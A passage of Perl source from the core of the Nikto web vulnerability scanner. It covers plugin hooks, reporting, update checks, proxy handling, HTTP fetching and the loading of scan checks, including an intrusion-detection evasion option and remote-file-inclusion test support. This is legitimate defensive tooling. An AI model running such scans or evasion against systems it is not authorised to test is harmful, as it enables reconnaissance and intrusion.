        next if ($torun_plugin eq \"\");\n\n            # split up into parameters\n            my $name = my $suffix = $torun_plugin;\n            if ($torun_plugin =~ /\\(/) {\n                $name   =~ s/(.*)(\\(.*\\))/$1/;\n                $suffix =~ s/(.*)(\\(.*\\))/$2/;\n            }\n            else {\n                $name   = $torun_plugin;\n                $suffix = \"\";\n            }\n            if ($plugin->{'name'} =~ /$name/i) {\n                $plugin->{'run'} = 1;\n\n                # Create parameters\n                if ($suffix ne \"\") {\n                    my $parameters = {};\n                    $suffix =~ s/(\\()(.*[^\\)])(\\)?)/$2/;\n                    foreach my $parameter (split(/,/, $suffix)) {\n                        if ($parameter !~ /:/) {\n                            $parameters->{$parameter} = 1;\n                        }\n                        else {\n                            my $key = my $value = $parameter;\n                            $key   =~ s/:.*//;\n                            $value =~ s/.*://;\n                            $parameters->{$key} = $value;\n                        }\n                    }\n                    $plugin->{'parameters'} = $parameters;\n                }\n            }\n        }\n    }\n\n    # For speed in future, create a hash of active plugins ordered by plugin weight, for\n    # each type of plugin\n\n    # first build a temporary hash of all known hooks\n    my %hooks;\n    foreach my $plugin (@PLUGINS) {\n        foreach my $hook (keys(%{ $plugin->{'hooks'} })) {\n            $hooks{$hook} = ();\n        }\n    }\n\n    # now we know the types of hooks, look through each plugin for them\n    foreach my $hook (keys(%hooks)) {\n        foreach my $plugin (@PLUGINS) {\n            if ($plugin->{'run'} == 1) {\n                if (defined $plugin->{'hooks'}->{$hook}->{'method'}) {\n                    push(@{ $hooks{$hook} }, $plugin);\n                }\n            }\n        }\n    }\n\n    # Now sort each array by weight\n    foreach my $hook (keys(%hooks)) {\n        my @sorted =\n          sort { $a->{'hooks'}->{$hook}->{'weight'} <=> $b->{'hooks'}->{$hook}->{'weight'} }\n          @{ $hooks{$hook} };\n        $PLUGINORDER{$hook} = \\@sorted;\n    }\n}\n\n###############################################################################\nsub run_hooks {\n    my ($mark, $type, $request, $result) = @_;\n    return if $mark->{'terminate'};\n\n    foreach my $plugin (@{ $PLUGINORDER{$type} }) {\n        return if $mark->{'terminate'};\n        my ($run) = 1;\n\n        # first check for conditionals\n        my $condition = $plugin->{'hooks'}->{$type}->{'cond'};\n        if (defined $plugin->{'hooks'}->{$type}->{'cond'}) {\n\n            # Evaluate condition\n            $run = eval($condition);\n        }\n\n        if (!$run) { next; }\n\n        my $oldverbose = $OUTPUT{'verbose'};\n        my $olddebug   = $OUTPUT{'debug'};\n        my $olderrors  = $OUTPUT{'errors'};\n        nprint(\"- Running $type for \\\"$plugin->{'full_name'}\\\" plugin\", \"v\")\n          unless ($type eq \"prefetch\" || $type eq \"postfetch\");\n        if (defined $plugin->{'parameters'}->{'verbose'}\n            && $plugin->{'parameters'}->{'verbose'} == 1) {\n            $OUTPUT{'verbose'} = 1;\n        }\n        if (defined $plugin->{'parameters'}->{'debug'}\n            && $plugin->{'parameters'}->{'debug'} == 1) {\n            $OUTPUT{'debug'} = 1;\n        }\n        unless ($type eq \"prefetch\" || $type eq \"postfetch\") {\n            $NIKTO{'current_plugin'} = $plugin->{'full_name'};\n        }\n        &{ $plugin->{'hooks'}->{$type}->{'method'} }($mark, $plugin->{'parameters'}, $request,\n                                                     $result);\n        $OUTPUT{'verbose'} = $oldverbose;\n        $OUTPUT{'debug'}   = $olddebug;\n        $OUTPUT{'errors'}  = $olderrors;\n    }\n\n    return $request, $result;\n}\n\n###############################################################################\nsub report_head {\n    my ($format, $file) = @_;\n    nprint(\"- Opening reports ($format, $file)\", \"v\");\n\n    # For tuning set up a list of report methods, formats and handles\n\n    # This is a frig until I can think of a better way of achieving it\n    foreach my $i (1 .. 100) {\n        foreach my $plugin (@PLUGINS) {\n            if ($plugin->{run} && defined $plugin->{report_item} && $plugin->{report_weight} == $i)\n            {\n                my $run = 1;\n\n                # first check for conditionals\n                if (defined $plugin->{report_format}) {\n\n                    # Evaluate condition\n                    $run = ($format eq $plugin->{report_format});\n                }\n                if ($run) {\n                    nprint(\"- Opening report for \\\"$plugin->{full_name}\\\" plugin\", \"v\");\n                    my $handle;\n                    if (defined $plugin->{report_head}) {\n                        $handle = &{ $plugin->{report_head} }($file);\n                    }\n\n                    # Now store this\n                    my $report_entry = { host_start => $plugin->{report_host_start},\n                                         host_end   => $plugin->{report_host_end},\n                                         item       => $plugin->{report_item},\n                                         close      => $plugin->{report_close},\n                                         summary    => $plugin->{report_summary},\n                                         handle     => $handle,\n                                         };\n\n                    push(@REPORTS, $report_entry);\n                }\n            }\n        }\n    }\n    return;\n}\n\n###############################################################################\nsub report_host_start {\n    my ($mark) = @_;\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{host_start}) {\n            &{ $reporter->{host_start} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_host_end {\n    my ($mark) = @_;\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{host_end}) {\n            &{ $reporter->{host_end} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_summary {\n    my ($mark) = @_;\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{summary}) {\n            &{ $reporter->{summary} }($reporter->{handle}, $mark);\n        }\n    }\n}\n\n###############################################################################\nsub report_item {\n    my ($mark, $item) = @_;\n    if ($item->{'uri'} eq 'undef') { $item->{'uri'} = '/'; }\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{item}) {\n            &{ $reporter->{item} }($reporter->{handle}, $mark, $item);\n        }\n    }\n}\n\n###############################################################################\nsub report_close {\n\n    # Go through all reporting modules\n    foreach my $reporter (@REPORTS) {\n        if (defined $reporter->{close}) {\n            &{ $reporter->{close} }($reporter->{handle});\n        }\n    }\n}\n\n###############################################################################\nsub check_updates {\n    $CLI{'nointeractive'}=1;\n    LW2::http_init_request(\\%request);\n    my (%REMOTE, %LOCAL, @DBTOGET) = ();\n    my ($pluginmsg, $remotemsg) = \"\";\n    my $code_updates = 0;\n    my $serverdir    = \"/nikto/UPDATES/$VARIABLES{'version'}\";\n    my $server       = \"CIRT.net\";\n\n\tnprint(\"-update is deprecated in git versions of Nikto; please pull directly from git.\");\n\n    # set up our mark\n    my %mark = ('ident' => $server,\n                'ssl'   => 1,\n                'port'  => 443\n                );\n\n    for (my $i = 0 ; $i <= $#ARGV ; $i++) {\n        if (($ARGV[$i] eq \"-u\") || ($ARGV[$i] eq \"-useproxy\")) {\n            $CLI{'useproxy'} = 1;\n            if (($CONFIGFILE{PROXYPORT} ne '') && ($CONFIGFILE{PROXYHOST} ne '')) {\n                $request{'whisker'}->{'proxy_host'} = $CONFIGFILE{PROXYHOST};\n                $request{'whisker'}->{'proxy_port'} = $CONFIGFILE{PROXYPORT};\n            }\n            proxy_check();\n            last;\n        }\n    }\n    ($mark{'hostname'}, $mark{'ip'}, $mark{'display_name'}) = resolve('cirt.net');\n\n    # retrieve versions file\n    my ($code, $content) = nfetch(\\%mark, \"$serverdir/versions.txt\", \"GET\");\n    if ($code eq 407) {\n        if ($CONFIGFILE{'PROXYUSER'} eq \"\") {\n            $CONFIGFILE{'PROXYUSER'} = read_data(\"Proxy ID: \",   \"\");\n            $CONFIGFILE{'PROXYPASS'} = read_data(\"Proxy Pass: \", \"noecho\");\n        }\n\n        # and try again\n        ($code, $content) = nfetch(\\%mark, \"$serverdir/versions.txt\", \"GET\");\n    }\n\n    if ($code eq \"\") {\n        ($code, $content) = nfetch(\\%mark, \"$serverdir/versions.txt\", \"GET\");\n    }\n\n    if ($code ne 200) {\n        nprint(\"+ ERROR ($code): Unable to get $mark{'hostname'}$serverdir/versions.txt\");\n        exit 1;\n    }\n\n    # make hash\n    for (split(/\\n/, $content)) {\n        my @l = parse_csv($_);\n        if ($_ =~ /^msg/) {\n            $remotemsg = \"$l[1]\";\n            next;\n        }\n        $REMOTE{ $l[0] } = $l[1];\n    }\n\n    # get local versions of plugins/dbs\n    my %NIKTOFILES;\n    my @F = dirlist($CONFIGFILE{'PLUGINDIR'}, \"\");\n    foreach my $f (@F) { $NIKTOFILES{$f} = $CONFIGFILE{'PLUGINDIR'} . \"/\" . $f; }\n    @F = dirlist($CONFIGFILE{'DBDIR'}, \"\");\n    foreach my $f (@F) { $NIKTOFILES{$f} = $CONFIGFILE{'DBDIR'} . \"/\" . $f; }\n\n    foreach my $file (keys %NIKTOFILES) {\n        my $v = \"\";\n        open(LOCAL, \"<$NIKTOFILES{$file}\")\n          || print STDERR \"+ ERROR: Unable to open '$NIKTOFILES{$file}' for read: $@\\n\";\n        my @l = <LOCAL>;\n        close(LOCAL);\n\n        my @VERS = grep(/^#VERSION/, @l);\n        chomp($VERS[0]);\n        $LOCAL{$file} = (parse_csv($VERS[0]))[1];\n    }\n\n    # check main nikto versions\n    foreach my $remotefile (keys %REMOTE) {\n        my @l = split(/\\./, $LOCAL{$remotefile});\n        my @r = split(/\\./, $REMOTE{$remotefile});\n        my $update = 0;\n        if ($LOCAL{$remotefile} eq '') { $update = 1; }\n        elsif ($r[0] > $l[0]) { $update = 1; }\n        elsif ($r[1] > $l[1]) { $update = 1; }\n        elsif ($r[2] > $l[2]) { $update = 1; }\n\n        if ($update) {\n            if ($remotefile eq \"nikto\") {\n                nprint\n                  \"+ Nikto has been updated to $REMOTE{$remotefile}, local copy is $VARIABLES{'version'}\\n\";\n                nprint\n                  \"+ No update has taken place. Please upgrade Nikto by visiting http://$server/\\n\";\n                if ($remotemsg ne \"\") { nprint(\"+ $server message: $remotemsg\"); }\n                exit 1;\n            }\n            push(@DBTOGET, $remotefile);\n            if ($remotefile !~ /^db_/) { $code_updates = 1; }\n        }\n    }\n\n    # replace local files if updated\n    foreach my $toget (@DBTOGET) {\n        nprint(\"+ Retrieving '$toget'\");\n        my ($code, $content) = nfetch(\\%mark, \"$serverdir/$toget\", \"GET\");\n        if ($code ne 200) {\n            nprint(\"+ ERROR: Unable to get $server$serverdir/$toget\");\n            exit 1;\n        }\n        if ($content ne \"\") {\n            my $dir = '';\n            if   ($toget =~ /^db_/) { $dir = $CONFIGFILE{'DBDIR'}; }\n            else                    { $dir = $CONFIGFILE{'PLUGINDIR'}; }\n            open(OUT, \">$dir/$toget\")\n              || die print STDERR \"+ ERROR: Unable to open '$dir/$toget' for write: $@\\n\";\n            print OUT $content;\n            close(OUT);\n        }\n    }\n\n    # CHANGES file\n    if ($code_updates) {\n        nprint(\"+ Retrieving 'CHANGES.txt'\");\n        my ($code, $content) = nfetch(\\%mark, \"$serverdir/CHANGES.txt\", \"GET\");\n        if (($content ne \"\") && ($code eq 200)) {\n            open(OUT, \">$CONFIGFILE{DOCDIR}/CHANGES.txt\")\n              || die print STDERR\n              \"+ ERROR: Unable to open '$CONFIGFILE{DOCDIR}/CHANGES.txt' for write: $@\\n\";\n            print OUT $content;\n            close(OUT);\n        }\n    }\n\n    check_modules();\n\n    if ($#DBTOGET < 0) { nprint(\"+ No updates required.\"); }\n    if ($remotemsg ne \"\") { nprint(\"+ $server message: $remotemsg\"); }\n    exit 1;\n}\n\n###############################################################################\n# portions of this sub were taken from the Term::ReadPassword module.\n# It has been modified to not require Term::ReadLine, but still requires\n# POSIX::Termios if it's a POSIX machine\n###############################################################################\nsub read_data {\n    if ($CONFIGFILE{PROMPTS} eq 'no') { return; }\n    my ($prompt, $mode, $POSIX) = @_;\n    my $input;\n\n    my %SPECIAL = (\"\\x03\" => 'INT',    # Control-C, Interrupt\n                   \"\\x08\" => 'DEL',    # Backspace\n                   \"\\x7f\" => 'DEL',    # Delete\n                   \"\\x0d\" => 'ENT',    # CR, Enter\n                   \"\\x0a\" => 'ENT',    # LF, Enter\n                   );\n\n        local (*TTY, *TTYOUT);\n        open TTY,    \"<&STDIN\"   or return;\n        open TTYOUT, \">>&STDOUT\" or return;\n\n        # Don't buffer it!\n        select((select(TTYOUT), $| = 1)[0]);\n        print TTYOUT $prompt;\n\n        # Remember where everything was\n        my $fd_tty = fileno(TTY);\n        my $term   = POSIX::Termios->new();\n        $term->getattr($fd_tty);\n        my $original_flags = $term->getlflag();\n\n        if ($mode eq \"noecho\") {\n            my $new_flags = $original_flags & ~(ISIG | ECHO | ICANON);\n            $term->setlflag($new_flags);\n        }\n        $term->setattr($fd_tty, TCSAFLUSH);\n      KEYSTROKE:\n        while (1) {\n            my $new_keys = '';\n            my $count = sysread(TTY, $new_keys, 99);\n            if ($count) {\n                for my $new_key (split //, $new_keys) {\n                    if (my $meaning = $SPECIAL{$new_key}) {\n                        if    ($meaning eq 'ENT') { last KEYSTROKE; }\n                        elsif ($meaning eq 'DEL') { chop $input; }\n                        elsif ($meaning eq 'INT') { last KEYSTROKE; }\n                        else                      { $input .= $new_key; }\n                    }\n                    else { $input .= $new_key; }\n                }\n            }\n            else { last KEYSTROKE; }\n        }\n\n        # Done with waiting for input. Let's not leave the cursor sitting\n        # there, after the prompt.\n        print TTY \"\\n\";\n        nprint(\"\\n\");\n\n        # Let's put everything back where we found it.\n        $term->setlflag($original_flags);\n        $term->setattr($fd_tty, TCSAFLUSH);\n        close(TTY);\n        close(TTYOUT);\n\n    return $input;\n}\n\n###############################################################################\nsub proxy_check {\n    my ($mark) = @_;\n\n    setup_hash(\\%request, $mark, \"Proxy Check\");\n    if (($request{'whisker'}->{'proxy_host'} ne '') && ($CLI{'useproxy'}))    # proxy is set up\n    {\n        LW2::http_close(\\%request);    # force-close any old connections\n        $request{'whisker'}->{'method'} = \"GET\";\n        $request{'whisker'}->{'uri'}    = \"/\";\n\n        LW2::http_fixup_request(\\%request);\n\n        sleeper();\n        LW2::http_do_request_timeout(\\%request, \\%result);\n        $COUNTERS{'totalrequests'}++;\n        dump_var(\"Request Hash\", \\%request);\n        dump_var(\"Result Hash\",  \\%result);\n\n        # First check that we can connect to the proxy\n        if (exists $result{'whisker'}{'error'}) {\n            if ($result{'whisker'}{'error'} =~ /Transport endpoint is not connected/) {\n                nprint(\"+ ERROR: Could not connect to the defined proxy $CONFIGFILE{PROXYHOST}\");\n            }\n            nprint(\"+ ERROR: Proxy error: $result{'whisker'}{'error'}\");\n            exit 1;\n        }\n\n        if ($result{'whisker'}{'code'} eq \"407\")    # proxy requires auth\n        {\n\n            # have id/pw?\n            if ($CONFIGFILE{PROXYUSER} eq \"\") {\n                $CONFIGFILE{PROXYUSER} = read_data(\"Proxy ID: \",   \"\");\n                $CONFIGFILE{PROXYPASS} = read_data(\"Proxy Pass: \", \"noecho\");\n            }\n            if ($result{'proxy-authenticate'} !~ /Basic/i) {\n                my @x = split(/ /, $result{'proxy-authenticate'});\n                nprint(\n                    \"+ Proxy server uses '$x[0]' rather than 'Basic' authentication. $VARIABLES{'name'} $VARIABLES{'version'} can't do that.\"\n                    );\n                exit 1;\n            }\n\n            # test it...\n            LW2::http_close(\\%request);    # force-close any old connections\n            LW2::auth_set(\"proxy-basic\", \\%request, $CONFIGFILE{PROXYUSER}, $CONFIGFILE{PROXYPASS}); # set auth\n            LW2::http_fixup_request(\\%request);\n            sleeper();\n            LW2::http_do_request_timeout(\\%request, \\%result);\n            $COUNTERS{'totalrequests'}++;\n            dump_var(\"Request Hash\", \\%request);\n            dump_var(\"Result Hash\",  \\%result);\n\n            if ($result{'proxy-authenticate'} ne \"\") {\n                my @pauthinfo  = split(/ /, $result{'proxy-authenticate'});\n                my @pauthinfo2 = split(/=/, $result{'proxy-authenticate'});\n                $pauthinfo2[1] =~ s/^\\\"//;\n                $pauthinfo2[1] =~ s/\\\"$//;\n                nprint(\n                    \"+ Proxy requires authentication for '$pauthinfo[0]' realm '$pauthinfo2[1]', unable to authenticate.\"\n                    );\n                exit 1;\n            }\n            else { nprint(\"- Successfully authenticated to proxy.\", \"v\"); }\n        }\n    }\n\n    return;\n}\n\n#######################################################################\nsub dump_var {\n    return if !$OUTPUT{'debug'};\n    my $msg     = $_[0];\n    my %hash_in = %{ $_[1] };\n\n    my $display = LW2::dump('', \\%hash_in);\n    $display =~ s/^\\$/'$msg'/;\n    if ($OUTPUT{'scrub'}) {\n\t$new = \"\";\n\tforeach my $line (split(/\\n/, $display)) {\n        \t$line = scrub($line);\n\t\t$new .= \"$line\\n\";\n\t}\n\t$display = $new;\n    }\n    nprint($display, \"d\");\n    return;\n}\n\n######################################################################\nsub content_present {\n    my $result = FALSE;\n    my $res    = $_[0];\n\n    # perform an extra check just in case the web server lies about finds\n    # basically assume that the value for a non-extension is the true\n    # code for \"File not Found\".\n    if ($res ne $FoF{'NONE'}{'response'}) {\n        foreach $found (split(' ', $VARIABLES{\"\\@HTTPFOUND\"})) {\n            if ($res eq $found) {\n                $result = TRUE;\n            }\n        }\n    }\n\n    return $result;\n}\n\n#######################################################################\nsub setup_hash {\n    my ($reqhash, $mark, $testid) = @_;\n\n    # Do the standard set up for the hash\n    LW2::http_init_request($reqhash);\n    $reqhash->{'whisker'}->{'ignore_duplicate_headers'}   = 0;\n    $reqhash->{'whisker'}->{'ssl_save_info'}              = 1;\n    $reqhash->{'whisker'}->{'keep-alive'}                 = 1;\n    $reqhash->{'whisker'}->{'max_size'}                   = 750000;\n    $reqhash->{'whisker'}->{'lowercase_incoming_headers'} = 1;\n    $reqhash->{'whisker'}->{'timeout'}                    = $CLI{'timeout'};\n    $reqhash->{'whisker'}->{'version'}                    = $NIKTOCONFIG{'DEFAULTHTTPVER'} || '1.1';\n    if ($CLI{'evasion'} ne '') {\n        $reqhash->{'whisker'}->{'anti_ids'} = $CLI{'evasion'};\n    }\n    $reqhash->{'User-Agent'} = $VARIABLES{'useragent'};\n    $reqhash->{'User-Agent'} =~ s/\\@TESTID/$testid/;\n    $reqhash->{'whisker'}->{'retry'} = 0;\n    $reqhash->{'whisker'}->{'host'} = $mark->{'hostname'} || $mark->{'ip'};\n\n    if ($mark->{'vhost'} ne '') {\n        $reqhash->{'Host'} = $mark->{'vhost'};\n    }\n    $reqhash->{'whisker'}->{'port'}            = $mark->{'port'};\n    $reqhash->{'whisker'}->{'ssl'}             = $mark->{'ssl'};\n    $reqhash->{'whisker'}->{'ssl_rsacertfile'} = $mark->{'key'};\n    $reqhash->{'whisker'}->{'ssl_certfile'}    = $mark->{'cert'};\n\n    # Proxy stuff\n    if (($CONFIGFILE{PROXYHOST} ne '') && ($CLI{'useproxy'})) {\n        $reqhash->{'whisker'}->{'proxy_host'} = $CONFIGFILE{'PROXYHOST'};\n        $reqhash->{'whisker'}->{'proxy_port'} = $CONFIGFILE{'PROXYPORT'};\n        if ($CONFIGFILE{'PROXYUSER'} ne '') {\n            LW2::auth_set(\"proxy-basic\", $reqhash,\n                          $CONFIGFILE{'PROXYUSER'},\n                          $CONFIGFILE{'PROXYPASS'});\n        }\n    }\n\n    return $reqhash;\n}\n\n#######################################################################\nsub running_average {\n        my $last = shift;\n\tmy ($mark) = @_;\n        unshift(@{$mark->{'running_avg'}},$last);\n        splice(@{$mark->{'running_avg'}},100);\n        }\n\n#######################################################################\nsub running_average_print {\n\tuse List::Util qw(sum);\n\tmy $message;\n\tmy ($mark) = @_;\n\tmy @data = @{$mark->{'running_avg'}};\n\tmy $elements=$#data;\n\t$elements++;\n\tif ($elements eq 100 ) {\n\t\tmy $s = sum(@data);\n\t\tmy $avg = $s / $elements;\n\t\t$avg = sprintf(\"%.5f\", $avg);\n\t\t$message = \"100 requests: $avg sec, \";\n\t\t}\n\tif ($elements > 10) {\n\t\t@data=splice(@data,9);\n\t\tmy $s = sum(@data);\n\t\t$elements=$#data;\n\t\t$elements++;\n\t\tmy $avg = $s / $elements;\n\t\t$avg = sprintf(\"%.4f\", $avg);\n\t\t$message .= \"10 requests: $avg sec\";\n\t\t}\n\n\tif ($message eq '') { $message=\"Not enough data\"; }\n\treturn \"Running average: $message.\";\n\t}\n\n#######################################################################\nsub nfetch {\n    my ($mark, $uri, $method, $data, $headers_send, $flags, $testid, $httpver) = @_;\n    my (%request, %result);\n    setup_hash(\\%request, $mark, $testid);\n\n    # check for keyboard input\n    if (!$CLI{'nointeractive'} && (($COUNTERS{'totalrequests'} % 10) == 0)) {\n        if (check_input($mark) eq 'term') { $mark->{'terminate'} = 1; }\n        if ($CLI{'until'} ne '') {\n            if ($CLI{'until'} <= time()) {\n                pause('u');\n            }\n        }\n    }\n\n    # check execution time\n    if ($CLI{'maxtime'} ne '') {\n        if ((time() - $mark->{'start_time'}) > $CLI{'maxtime'}) {\n            nprint(\"+ ERROR: Host maximum execution time of $CLI{'maxtime'} seconds reached\");\n            $mark->{'terminate'} = 1;\n        }\n    }\n\n    $request{'whisker'}->{'uri'}    = $mark->{'root'} . $uri;  # prepend -root option's value if set\n    $request{'whisker'}->{'method'} = $method;\n\n    if ($data ne \"\") {\n        $data =~ s/\\\\\\\"/\\\"/g;\n        $request{'whisker'}->{'data'} = $data;\n    }\n\n    # check for extra HTTP headers\n    if (ref($headers_send) eq \"HASH\") {\n\n        # loop through the hash ref passed and add each header to request\n        while (my ($key, $value) = each(%$headers_send)) {\n            $request{$key} = $value;\n        }\n    }\n\n    # set cookies\n    if (defined($mark->{'cookiejar'})) {\n        LW2::cookie_write($mark->{'cookiejar'}, \\%request, 1);\n    }\n\n    # over-ride HTTP version\n    if ($httpver ne '') {\n        $request{'whisker'}->{'version'} = $httpver;\n    }\n\n    if ($flags->{'nohost'}) {\n\t\t$request{'whisker'}->{'host'} = $mark->{'ip'};\n\t}\n\n    LW2::http_fixup_request(\\%request) unless ($flags->{'noclean'});\n\n    # Run pre hooks\n    unless ($flags->{'noprefetch'}) {\n        (%$request, %$result) = run_hooks($mark, \"prefetch\", \\%request, \\%result);\n    }\n\n    # do the request\n    sleeper();\n    my $time=[gettimeofday];\n    LW2::http_do_request_timeout(\\%request, \\%result);\n    $COUNTERS{'totalrequests'}++;\n    if ($^O !~ /MSWin32/) {\n\t\trunning_average(tv_interval($time, [gettimeofday]), $mark);\n\t}\n\n    # If we got an error, do 1 retry. This should be much more intelligent and configurable!\n    if (defined $result{'whisker'}->{'error'} || $result{'whisker'}{'code'} eq '') {\n\t$mark->{'failures'}++;\n        sleeper();\n        LW2::http_do_request_timeout(\\%request, \\%result);\n        $COUNTERS{'totalrequests'}++;\n    }\n    if (($CONFIGFILE{'FAILURES'} > 0) && ($mark->{'failures'} >= $CONFIGFILE{'FAILURES'})) {\n\tnprint(\"+ ERROR: Error limit ($CONFIGFILE{'FAILURES'}) reached for host, giving up. Last error: \" . $result{'whisker'}->{'error'});\n\t$mark->{'terminate'} = 1;\n\t}\n\n\n    if ($OUTPUT{'debug'}) {\n        dump_var(\"Request Hash\", \\%request);\n        dump_var(\"Result Hash\",  \\%result);\n    }\n\n    # Snarf what we can from the whisker hash and put in mark\n    if (!exists $result{'whisker'}->{'error'}) {\n        if (!exists $mark->{'banner'}) {\n            $mark->{'banner'} = $result{'server'};\n        }\n        else {\n\n            # Check banner hasn't changed\n            if (   exists $result{'server'}\n                && !exists $mark->{'bannerchanged'}\n                && ($mark->{'banner'} ne $result{'server'})\n\t\t&& ($result{'server'} ne 'Microsoft-HTTPAPI/2.0')\n\t\t) {\n\t\tadd_vulnerability($mark, \"Server banner changed from '$mark->{banner}' to '$result{server}'\", 999962, 0, $method, $uri, $request, $response);\n                $mark->{'bannerchanged'} = 1;\n            }\n        }\n\n        if (!exists $mark->{'ssl_cipher'} && $mark->{'ssl'}) {\n\n            # Grab ssl details\n            $mark->{'ssl_cipher'}       = $result{'whisker'}->{'ssl_cipher'};\n            $mark->{'ssl_cert_issuer'}  = $result{'whisker'}->{'ssl_cert_issuer'};\n            $mark->{'ssl_cert_subject'} = $result{'whisker'}->{'ssl_cert_subject'};\n            # ssl_cert_altnaems comes back as an array\n            foreach my $n (@{$result{'whisker'}->{'ssl_cert_altnames'}}) {\n\t\tnext if $n =~ /^[\\d]+$/; # type\n\t\t$mark->{'ssl_cert_altnames'} .= \"$n, \";\n\t\t}\n            $mark->{'ssl_cert_altnames'} =~ s/, $//;\n        }\n    }\n\n    nprint(\"- $result{'whisker'}{'code'} for $method:\\t$result{'whisker'}->{'uri_requested'}\", \"v\");\n\n    # Check for errors to reduce false positives\n    if ((defined $result{'whisker'}->{'error'} || $result{'whisker'}{'code'} eq '')\n        && !exists $flags->{'noerror'}) {\n        $mark->{'total_errors'}++;\n        nprint(\n            \"+ ERROR: $result{'whisker'}->{'uri_requested'} returned an error: $result{'whisker'}{'error'}\\n\",\n            \"e\"\n            );\n        if (($result{'whisker'}->{'code'} eq 502) && ($CLI{'useproxy'})) {\n            nprint(\"+ ERROR: Revieved 502 'Bad Gateway' from proxy\\n\");\n        }\n    }\n\n    if ($OUTPUT{'show_cookies'} && (defined($result{'whisker'}->{'cookies'}))) {\n        foreach my $c (@{ $result{'whisker'}->{'cookies'} }) {\n            nprint(\"+ $result{'whisker'}->{'uri_requested'} sent cookie: $c\");\n        }\n    }\n\n    # Run post hooks\n    unless ($flags->{'nopostfetch'}) {\n        ($request, %$result) = run_hooks($mark, \"postfetch\", \\%request, \\%result);\n    }\n\n    return $result{'whisker'}->{'code'}, $result{'whisker'}->{'data'},\n      $result{'whisker'}->{'error'}, \\%request, \\%result;\n}\n\n#######################################################################\nsub set_scan_items {\n\n    # load the tests\n    %TESTS = ();\n    $COUNTERS{total_checks} = 0;\n    my @SKIPLIST = ();\n    if (defined $CONFIGFILE{SKIPIDS}) {\n        @SKIPLIST = split(/ /, $CONFIGFILE{SKIPIDS});\n    }\n\n    # now load checks\n    foreach my $line (@DBFILE) {\n        if ($line =~ /^\\\"/)    # check\n        {\n            chomp($line);\n            my @item = parse_csv($line);\n            my $add  = 1;\n\n            # check tuning options\n            if ((defined $CLI{'tuning'}) && (defined $item[2])) {\n\n                # Work out the required tuning from the CLI string\n                my $exclude = 0;\n                foreach my $tune (split(//, $CLI{'tuning'})) {\n                    if ($tune eq \"x\") {\n                        $exclude = 1;\n                        next;\n                    }\n                    if ($exclude == 0) {\n                        if ($item[2] !~ /$tune/) { $add = 0; }\n                        next;\n                    }\n                    if ($exclude == 1) {\n                        if ($item[2] =~ /$tune/) { $add = 0; }\n                    }\n                }\n            }\n\n            # Skip list\n            foreach my $id (@SKIPLIST) {\n                if ($id eq $item[0]) { $add = 0; }\n            }\n\n            # RFI URL Defined?\n            if (($item[2] =~ /c/) && ($VARIABLES{'@RFIURL'} eq '')) {\n                $add = 0;\n            }\n\n            if ($add) {\n                my $ext = get_ext($item[3]);\n                $db_extensions{$ext} = 1;\n\n                # validate...\n                for (my $y = 5 ; $y <= 9 ; $y++) {\n                    next if $item[$y] eq '';\n                    $item[$y] =~ s/\\\\\"/\"/g;    # quotes are only escaped for csv parsing\n                    $item[$y] = validate_and_fix_regex($item[$y]);\n                }\n\n                $COUNTERS{total_checks}++;\n                $TESTS{ $item[0] }{'uri'}         = $item[3];\n                $TESTS{ $item[0] }{'osvdb'}       = $item[1];\n                $TESTS{ $item[0] }{'method'}      = $item[4];\n                $TESTS{ $item[0] }{'match_1'}     = $item[5];\n                $TESTS{ $item[0] }{'match_1_or'}  = $item[6];\n                $TESTS{ $item[0] }{'match_1_and'} = $item[7];\n                $TESTS{ $item[0] }{'fail_1'}      = $item[8];\n                $TESTS{ $item[0] }{'fail_2'}      = $item[9];\n                $TESTS{ $item[0] }{'message'}     = $item[10];\n                $TESTS{ $item[0] }{'data'}        = $item[11];\n                $TESTS{ $item[0] }{'headers'}     = $item[12];\n            }\n        }\n    }\n\n    undef @DBFILE;    # this memory hog is no longer needed!\n    nprint(\"- $COUNTERS{'total_checks'} server checks loaded\", \"v\");\n    if ($COUNTERS{'total_checks'} eq 0 && !defined $CLI{'tuning'}) {\n        nprint(\"+ Unable to load valid checks!\");\n        exit 1;\n    }\n    return;\n}\n\n#######################################################################\nsub max_test_id {\n    return (sort { $a <=> $b } keys %TESTS)[-1];\n}\n\n#######################################################################\n# extract IP like strings and return an array\nsub get_ips {\n    my $string = $_[0] || return;\n    my @ips;\n    while ($string =~ /(?:\\b|[^0-9v])([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})(?:\\b|[^0-9])/g) {\n        push(@ips, $1);\n    }\n    return @ips;\n}\n\n#######################################################################\n# Check an IP's validity. Returns booleans for: validity, internal, loopback\nsub is_ip {\n    my $ip       = $_[0] || return 0, 0, 0;\n    my $internal = 0;\n    my $loopback = 0;\n\n    # simple syntax check\n    # this will fail on some edge cases, but it's 99%...\n    if ($ip !~ /^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$/) {\n        return 0, $internal, $loopback;\n    }\n\n    # now validate octets\n    my @octets = split(/\\./, $ip);\n    if (scalar(@octets) ne 4) { return 0, $internal, $loopback; }\n    for (my $o = 0 ; $o <= 3 ; $o++) {\n        if (($octets[$o] < 0) || ($octets[$o] > 255)) { return 0, $internal, $loopback; }\n        if ($octet[$o] =~ /^0/) { return 0, $internal, $loopback; }\n        if (($o eq 0) && ($octets[$o] < 1)) { return 0, $internal, $loopback; }\n    }\n\n    # now check for internal\n    if ($ip =~ /^(?:10|192\\.168|172\\.(?:1[6-9]|2\\d|3[01]))\\./) { $internal = 1; }\n\n    # lastly, loopback?\n    if ($ip eq '127.0.0.1') { $loopback = 1; }\n\n    return 1, $internal, $loopback;\n}\n\n#######################################################################\nsub parse_csv {\n    my $text = $_[0] || return;\n    my @new = ();\n    push(@new, $+) while $text =~ m{\n      \"([^\\\"\\\\]*(?:\\\\.[^\\\"\\\\]*)*)\",?\n       |  ([^,]+),?\n       | ,\n   }gx;\n    push(@new, undef) if substr($text, -1, 1) eq ',';\n    return @new;\n}\n#######################################################################\nsub check_modules {\n    # Check dependencies\n    eval \"require JSON::PP\";\n    if ($@) {\n        